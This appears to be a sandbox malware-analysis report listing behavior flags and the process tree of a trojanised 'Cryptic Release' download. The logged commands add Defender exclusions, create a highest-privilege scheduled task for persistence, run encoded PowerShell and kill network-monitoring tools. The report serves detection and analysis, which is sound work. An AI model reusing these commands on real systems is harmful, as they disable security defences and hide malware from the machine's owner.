Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4.rar"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4220,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=3840 /prefetch:8
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4.rar
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\9e9016582fdb4022a2fb72db5b9765bd /t 1200 /p 3700
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc8435ab58,0x7ffc8435ab68,0x7ffc8435ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2292 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3004 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3080 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3656 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4348 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4392 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4556 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4804 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3960 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2696 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3312 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3132 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3240 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5220 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5416 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5556 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5628 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3340 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4952 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5240 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3276 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6022:106:7zEvent13920
C:\Users\Admin\Downloads\Cryptic Release V1.4.4\Cryptic Release V1.4.exe
"C:\Users\Admin\Downloads\Cryptic Release V1.4.4\Cryptic Release V1.4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaAB4ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAZwBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBHAEcALwBDAFIAWQBQAFQASQBDAFMAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGcAeQAjAD4A"
C:\Users\Admin\AppData\Local\Temp\hex.exe
"C:\Users\Admin\AppData\Local\Temp\hex.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2216_133633812136880540\hex.exe
"C:\Users\Admin\AppData\Local\Temp\hex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AIM\RuntimeBroker\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\AIM\RuntimeBroker\RuntimeBroker.exe
C:\Users\Admin\AppData\Local\Temp\AIM\RuntimeBroker\RuntimeBroker.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAagBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZQBkACMAPgA="
C:\Users\Admin\dllhost.exe
"C:\Users\Admin\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\nexusloader.exe
"C:\Users\Admin\AppData\Local\Temp\nexusloader.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3068_133633812190834193\nexusloader.exe
"C:\Users\Admin\AppData\Local\Temp\nexusloader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
C:\Users\Admin\Downloads\Cryptic Release V1.4.4\Cryptic Release V1.4.exe
"C:\Users\Admin\Downloads\Cryptic Release V1.4.4\Cryptic Release V1.4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaAB4ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAZwBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBHAEcALwBDAFIAWQBQAFQASQBDAFMAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGcAeQAjAD4A"
C:\Users\Admin\AppData\Local\Temp\hex.exe
"C:\Users\Admin\AppData\Local\Temp\hex.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2348_133633812312413043\hex.exe
"C:\Users\Admin\AppData\Local\Temp\hex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AIM\RuntimeBroker\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\AIM\RuntimeBroker\RuntimeBroker.exe
C:\Users\Admin\AppData\Local\Temp\AIM\RuntimeBroker\RuntimeBroker.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAagBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZQBkACMAPgA="
C:\Users\Admin\dllhost.exe
"C:\Users\Admin\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\nexusloader.exe
"C:\Users\Admin\AppData\Local\Temp\nexusloader.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3508_133633812350707896\nexusloader.exe
"C:\Users\Admin\AppData\Local\Temp\nexusloader.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2796 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:2
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=5728 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\kfgovv.exe
"C:\Users\Admin\AppData\Local\Temp\kfgovv.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5936_133633812782488386\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\kfgovv.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\onefile_5936_133633812782488386\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\onefile_5936_133633812782488386\svchost.exe" "--multiprocessing-fork" "parent_pid=5324" "pipe_handle=836"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3056 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5812 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath C:\path\to\exclude"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3224 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2780 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1776 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
